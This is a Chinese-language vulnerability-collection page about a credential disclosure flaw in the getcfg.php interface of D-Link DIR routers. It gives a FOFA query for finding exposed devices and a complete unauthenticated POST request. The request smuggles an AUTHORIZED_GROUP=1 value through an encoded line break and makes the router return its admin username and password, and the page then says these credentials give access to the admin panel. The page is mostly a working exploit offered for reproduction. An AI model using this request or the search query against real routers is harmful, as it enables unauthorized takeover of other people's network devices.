menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right D-Link Dir-645 getcfg.php 账号密码泄露漏洞 chevron_right D-Link Dir-645 getcfg.php 账号密码泄露漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    D-Link Dir-645 getcfg.php 账号密码泄露漏洞.md
    944 B / 2021-07-15 19:46:04
        # D-Link Dir-645 getcfg.php 账号密码泄露漏洞

## 漏洞描述

D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED_GROUP = 1%0a来获取getcfg.php的路由器的用户名和密码(以及其他信息)。这可用于远程控制路由器。

## 漏洞影响

> D-Link Dir 系列多个版本

## FOFA

> app="D_Link-DIR-868L"

## 漏洞复现

登录页面如下

![link-14](/resource/D-Link/link-14.png)

发送如下请求包

```
POST /getcfg.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 61

SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
```

![link-15](/resource/D-Link/link-15.png)

获取到路由器账号密码即可登录后台
    links
    file_download